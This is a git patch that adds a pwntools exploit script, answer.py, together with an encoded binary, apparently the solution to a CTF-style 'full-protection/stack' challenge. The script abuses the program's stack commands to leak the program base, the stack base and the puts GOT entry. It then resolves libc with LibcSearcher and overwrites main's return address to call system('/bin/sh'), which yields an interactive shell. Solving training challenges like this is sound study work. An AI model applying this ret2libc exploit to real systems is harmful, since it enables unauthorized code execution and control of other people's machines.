From 34783fa88d1a668bbd6415b704bb242ed5751a93 Mon Sep 17 00:00:00 2001 From: Jack Ren Date: Fri, 17 Sep 2021 12:05:51 +0800 Subject: [PATCH] Finished full-protection/stack --- full-protection/stack/answer.py | 97 ++++++++++++++++++++++++++++++++ full-protection/stack/stack | Bin 0 -> 7724 bytes 2 files changed, 97 insertions(+) create mode 100755 full-protection/stack/answer.py create mode 100755 full-protection/stack/stack diff --git a/full-protection/stack/answer.py b/full-protection/stack/answer.py new file mode 100755 index 0000000..565193a --- /dev/null +++ b/full-protection/stack/answer.py @@ -0,0 +1,97 @@ +#!/usr/bin/env python2 +from pwn import * +from LibcSearcher import * +from struct import pack, unpack +import os, base64, math, time +context(arch = "i386",os = "linux", log_level = "debug") + +# Python's int is variable-length, so we must transfer them to C-format +def parseInt2Addr(num): + return u32(struct.pack("i", num)) + +def parseAddr2Int(num): + return unpack("i", p32(num))[0] + +def chgtop_stack(p, top): + p.recvuntil("Cmd >>\n") + p.sendline("c") + p.recvuntil("Cmd >>\n") + p.sendline("p") + p.recvuntil("Cmd >>\n") + p.sendline("i %d" % top) + +def write_stack(p, shift, value): + chgtop_stack(p, shift - 1) + p.recvuntil("Cmd >>\n") + p.sendline("i %d" % parseAddr2Int(value)) + +def read_stack(p, shift): + chgtop_stack(p, shift) + p.recvuntil("Cmd >>\n") + p.sendline("p") + p.recvuntil("Pop -> ") + s = p.recvuntil("\n") + return parseInt2Addr(int(s)) + +def execute(p): + p.recvuntil("Cmd >>\n") + p.sendline("x") + p.recvuntil("Bye\n") + +p = process('./stack') +elf = ELF('./stack') +#gdb.attach(p, "b *(&main+471)") # retn of main + +#time.sleep(5) + +# Read program base shift from stack retaddr pushed by _start at 0x5ac +program_base = read_stack(p, 121) - 0x5b1 +print("Program Base: %s" % hex(program_base)) +# Read user stack base by reading ECX pushed to stack at 0x74e +user_stack_base = read_stack(p, 85) - 0x178 +print("User Stack Base: %s" % hex(user_stack_base)) +main_sym = elf.sym['main'] + program_base +print("Main Symbol: %s" % hex(main_sym)) +# In fact, puts_plt is no usage here +puts_plt = elf.plt['puts'] + program_base +print("puts PLT: %s" % hex(puts_plt)) +puts_got = elf.got['puts'] + program_base +print("puts GOT: %s" % hex(puts_got)) +""" +# Cannot use puts PLT to leak puts GOT there at return of main +# because PIE mode PLT use EBX to store offset but when returning EBX is null + +# Write main retaddr at shift 89 to call puts +write_stack(p, 89 + unified_shift, puts_got) +# Write retaddr of puts at shift 90 back to main +write_stack(p, 90 + unified_shift, main_sym) +# Write arg1 at shift 91 to pass GOT of puts +write_stack(p, 91 + unified_shift, puts_got) +execute(p) +puts_libc = u32(p.recv(4)) +""" + +# Leask puts_got by using a +puts_libc = read_stack(p, (puts_got - user_stack_base) / 4) +print("puts libc: %s" % hex(puts_libc)) + +libc = LibcSearcher('puts', puts_libc) +libc_base = puts_libc - libc.dump('puts') +print("base libc: %s" % hex(libc_base)) +system_libc = libc_base + libc.dump('system') +print("system libc: %s" % hex(system_libc)) +binsh_libc = libc_base + libc.dump('str_bin_sh') +print("/bin/sh libc: %s" % hex(binsh_libc)) + +# A unified shift was applied to original shift to use in main's stack frame +# Because of the compiler's alignment +unified_shift = 4 + +# Write main retaddr at shift 89 to call system +write_stack(p, 89 + unified_shift, system_libc) +# Write retaddr of puts at shift 90 back to main +write_stack(p, 90 + unified_shift, main_sym) +# Write arg1 at shift 91 to pass "/bin/sh" +write_stack(p, 91 + unified_shift, binsh_libc) +execute(p) +p.interactive() \ No newline at end of file diff --git a/full-protection/stack/stack b/full-protection/stack/stack new file mode 100755 index 0000000000000000000000000000000000000000..b2ca7d443e11c25b0df88682641a79e5c7f0befa GIT binary patch literal 7724 zcmeHMeQ;FO6~CKZaD}i57)w-I-q4_6$(le6ppLR6;X?z4B#27!x!I3oWwRT0-(p}G zC9F}?bsdIj$Btv2I^fh++Od<->d07dib&$I*vn+K&6BmnF;@jeKF&-+~ z6l=&pMi$`#yTR?iiZ1~s(+0Io*5wk(nPtToaFV zToVsh$76|1uRopi&$VpKOZ(E5tMRqk!I&DDc`Lx|JK7U#H?+Kc@csKLKfChv`ihg! z-}&LWO4=rY8H0W04U5^tWnj|crazv3`GXx>cHi>B-lH3CpSJ$~$G2FP(eEvzNihZK zyaQ`U`yH5eXGaj<;IPj?dbR`8{&NS`kZyHg+OKus$w!z%V%Z1v}4^b9*-)W1^bz&Bka#8GtO6!s>@D#S6W7y9yB^|TR= zCG<=>5*E51OD97M7wYLyFcB3!86z!vQn7>)74S-C40wckgL*WU2*zWZBO)C!Ixf%%5)K+c=sVJB%Mq#sid^2lLJvn$k!aMakYQkfts@JtjxsjEyU#-7SV~TrP2m z7|)3e;yU+29<}9}=@#~AmV5)4zDFogowq2l7>-h6;k-|YDjuW6f;vu#F)mUf@M%ia z=p5w)A%-Y1QHCk8@3du4dy9jpKwn`H^DmdJLb`viF|N1-iR^3MwFO9v%t5YHb0_Od zGIt_?h;BD`a`jSH+H#sLHCr+$?XzsTK+4(=?;7|^_V}5W_SPcTQ(vJ5Rmf-eo;1yt zeD-dNRkxXg9GT*8P18J=n^skbZdZR}QFME8Dmtp~)l=BE^FLUIO!;kG^0N%PR9tM9ZxkK0F!^<+K&opx%9jHHeAqTVG~8 zk+~|DWf!3`le4Ew&A~>1;{Gp86ETX{BFBL&9bIGN73V|O_v%EpZ`(9@<-GleGZ&w1 zL^5w&DRMjbtArYTXtl6K*6HxcD!Nuw6`(Cn#~d1W2;-D%^5#T-nJc&2J1_yC+=|kH z=53zs>!jNddUD)TBW^7w+y}~;M}8W&d)5{5%~c+Zp1ENdf!DOH>O1{?9>JFbI%>$8GDn$R-~))xy4wB+Eq@szI~nD*6i*Dx z5U181ls@p68M4!)_0P8TCfVR>se9eleNXDS zF=X#6JoYVF`CPn8%MVs!J{1f9#-z(uAUXTMzAsApKQU(3n)w&3R(edMY7Tj|`NNm# zlRfA{Z!Y{-=7a2OrEBlfF?%+OvyQdQHQiRcS{8P-EX-TnjUwd!bcs}7LNzxeo&{Xk zq1(G+X{{%f>`Vo_wNSFVCl-%{wR>Ym*L7NFD5O<)&zq}NuZhp8-aIE2iKmiGB$D@P z)zO|9%ssIPlJfVd8exn`$VjF%iTyAqt)vhQ$?oo8B7EHh4HVO=HU{HN^<>gr7BFmA z>Ci(Ps3+N@MN`RcD~dFQEQ=P3M}l@iQr~OqBfT+0HAotwwn6^(YSDPGQ#5pkwHt2~ zGsB{V<|xmCEfcwJYNdOQz9uR+J{^lrrG9xr^}CBD*|%O)D0 zUUAdq*IzxiY6k6#z{8)JrrhiUK5u`?;z{E|`w_*?54#(6nFT47J#5(*K(!S-5q6%R zL}RH-EG-{bk`Ya1?u;?M{GyV~mU4GVrq{jCwGYNXA#gCTzX8!%r#;}GVH%?-Nz3r% z2K5AV>!^|C1$?CsxdXoP2R#8_MRwdupBD2~HTq^X`sM_DH7k7DQeQ=&;42Rt@RbG* z`n-YtJ_Ka^X{gh4h=uK4QYF4M(Cvm!_8a17OIG@1|JXkN7yo-b@Ep#7cY{fsrevPd zJUAobpelCZEQs@iJa=9}J(%|noeYN%enmT{oY)h}rt*NcAsjpdhei(^) z=Onm0Ye3mYB)6~{!alSxd)exH3uBN$ z9CMOejvV%b5zG<9emH_TLoj9|m@~ziE0k`52M5rLR#;%`*3CBrl3UIO>^~!zGr^i; zlx{gAtT|?3&J5gL?D2EkJG&ZBw>`5sr$}yrUw)D%zra&v!aIW13{&>Y&ifma=*CKfi>Wb%#ZQm6rWNuNqkH@4ImBU{|K>7%>N{?nh$&%Sq#j* zjx+`H_v!Qe_W_@_$BXgbaoA@d&sky(3}QT4aSI|Ibk>rV8Vz6Gt2|7ACYMYVbAX+1 zG1oi%ng4cR4fW%1Kl|e!kfjbCCy zPsMzl1%@K^iM6z)f%l#w3s>VED+4Q* zH^9qbK^ZANr{UpKZ(3$YTh`br^rg+WE)F#7w=P-I*3_=I2NpLsu>|?T7D{Ji%j}1@ zMT^wi7P{eUAJTdk)cZRlhTap>jjl{$y}zT^e%TunLp{>T9vFGN8+EBeMZOd&+zYMq zS#Z>!Pi`1Qy!_d3etc3KHFNOBKJn?{bW-oat&7ip=RZ!K_sBRl&Pe~TlZ77b(Yx-o zUoFQvjy^!zFO^?vP!J8e&|BkqZ<=~M84AWx1|K?kD@1FY@28{1&W8mrn`*Xjq%Qbo zX@^So;88lgsoMy4KpH7acBvHJVJKblUTxrhXrazT#@~^N;UPX27Jj0x zAnN50Z%QDZC5@D2*%(Qsc@30qHqc?im6`s+FFVrT6E_4u{>~&4Mx+;CE-pAG<&&;I z(q%8Ft}wDIWaYQkm6b!K?+L*TB?P-;Atd-L?8l%8KNfa37OUJ$zTt)Xn-&XjMt5jjIsn|bp`0@9jEbqV2lT?wj7yva^KqKw= zC(_ijT(1U(pK2piG6v;2J6%Hnq950hB9=wwS%